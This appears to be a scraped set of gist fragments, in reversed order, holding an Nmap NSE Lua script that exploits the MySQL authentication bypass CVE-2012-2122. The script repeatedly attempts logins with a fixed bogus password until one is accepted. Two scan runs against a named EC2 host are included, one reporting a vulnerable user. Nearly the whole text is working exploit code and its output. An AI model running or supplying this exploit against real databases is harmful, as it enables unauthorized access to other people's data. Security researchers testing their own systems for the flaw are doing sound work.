This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# nmap -v -d --script=mysql-auth-bypass.nse -p 3306 -Pn --script-args="userdb=usernames.txt" ec2-46-137-134-79.eu-west-1.compute.amazonaws.com | |
Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-06-12 14:59 BST | |
--------------- Timing report --------------- | |
hostgroups: min 1, max 100000 | |
rtt-timeouts: init 1000, min 100, max 10000 | |
max-scan-delay: TCP 1000, UDP 1000, SCTP 1000 | |
parallelism: min 0, max 0 | |
max-retries: 10, host-timeout: 0 | |
min-rate: 0, max-rate: 0 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# nmap --script=mysql-auth-bypass.nse -p 3306 -Pn --script-args="userdb=usernames.txt" ec2-46-137-134-79.eu-west-1.compute.amazonaws.com | |
Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-06-12 14:58 BST | |
Nmap scan report for ec2-46-137-134-79.eu-west-1.compute.amazonaws.com (46.137.134.79) | |
Host is up (0.050s latency). | |
PORT STATE SERVICE | |
3306/tcp open mysql | |
| mysql-auth-bypass: | |
|_ user nse is vulnerable to auth bypass |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
return stdnse.format_output(true, result) | |
end |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
socket:close() | |
end | |
end |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
status, response = mysql.loginRequest( socket, { authversion = "post41", charset = response.charset }, username, password, response.salt ) | |
if response.errorcode == 0 then | |
table.insert(result, string.format("user %s is vulnerable to auth bypass", username ) ) | |
break | |
end |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
status, response = mysql.receiveGreeting( socket ) | |
if ( not(status) ) then | |
stdnse.print_debug(3, SCRIPT_NAME) | |
socket:close() | |
return response | |
end |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
for username in usernames do | |
stdnse.print_debug( "Trying %s ...", username ) | |
-- try up to 300 times to trigger the vuln | |
for i = 0, 300, 1 do | |
stdnse.print_debug(2, "attempt number %d", i ) | |
local status, response = socket:connect(host, port) | |
if( not(status) ) then return " \n ERROR: Failed to connect to mysql server" end |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
-- set a reasonable timeout value | |
socket:set_timeout(5000) | |
-- get our usernames to try | |
local usernames = try(unpwdb.usernames()) | |
local password = "cve-2012-2122" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
action = function( host, port ) | |
local socket = nmap.new_socket() | |
local catch = function() socket:close() end | |
local try = nmap.new_try(catch) | |
local result = {} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
portrule = shortport.port_or_service(3306, "mysql") |